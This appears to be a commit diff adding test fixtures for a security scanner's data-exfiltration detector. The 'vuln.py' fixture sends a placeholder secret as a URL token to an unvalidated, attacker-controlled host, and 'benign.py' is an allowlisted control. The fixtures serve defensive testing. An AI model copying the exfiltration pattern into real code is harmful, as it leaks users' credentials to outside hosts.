[pitboss] phase 11: Track J.9 + Track L.9 — CRYPTO, JSON_PARSE, UNAUTHORIZED_ID, DATA_EXFIL corpora

2026-06-09 19:45:13 +02:00 · 2026-05-18 09:37:37 -05:00 · 2026-05-18 09:37:37 -05:00 · 6784d73e25
commit 6784d73e25
parent 61a9e4e5df
85 changed files with 2508 additions and 30 deletions
--- a/tests/dynamic_fixtures/data_exfil/python/benign.py
+++ b/tests/dynamic_fixtures/data_exfil/python/benign.py
@ -0,0 +1,15 @@
+# Phase 11 (Track J.9) — Python DATA_EXFIL benign control fixture.
+#
+# Sends to a loopback receiver, so the captured host is on-allowlist
+# and the predicate stays clear.
+import urllib.request
+
+ALLOWLIST = {"127.0.0.1", "localhost"}
+
+
+def run(host):
+    if host not in ALLOWLIST:
+        return
+    secret = "alice-creds"
+    url = f"http://{host}/exfil?token={secret}"
+    urllib.request.urlopen(url, timeout=1)
--- a/tests/dynamic_fixtures/data_exfil/python/vuln.py
+++ b/tests/dynamic_fixtures/data_exfil/python/vuln.py
@ -0,0 +1,12 @@
+# Phase 11 (Track J.9) — Python DATA_EXFIL vuln fixture.
+#
+# Sends a captured secret to an attacker-controlled host without
+# host validation; the harness's mock HTTP client records the
+# outbound `host` and the `OutboundHostNotIn` oracle fires.
+import urllib.request
+
+
+def run(host):
+    secret = "alice-creds"
+    url = f"http://{host}/exfil?token={secret}"
+    urllib.request.urlopen(url, timeout=1)